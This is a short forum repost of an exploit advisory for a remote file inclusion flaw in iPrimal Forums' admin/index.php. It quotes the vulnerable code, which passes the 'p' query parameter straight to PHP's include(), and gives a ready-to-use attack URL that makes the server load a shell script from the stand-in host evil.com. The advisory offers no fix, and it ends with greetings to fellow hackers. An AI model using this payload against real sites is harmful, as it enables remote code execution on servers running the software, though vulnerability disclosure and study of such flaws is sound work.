iPrimal Forums (admin/index.php) Remote File Include Vulnerability
[code]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:[url]http://ipigroup.org/downloads/forums.zip[/url]
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code: #line 126-129
.....
if($_GET['p'] == ''){
echo 'Please select an item from the menu above.';
}else{
include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
[url]http://host.com/admin/index.php?p=http://evil.com/shell.txt?[/url]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!
[/code]
页:
[1]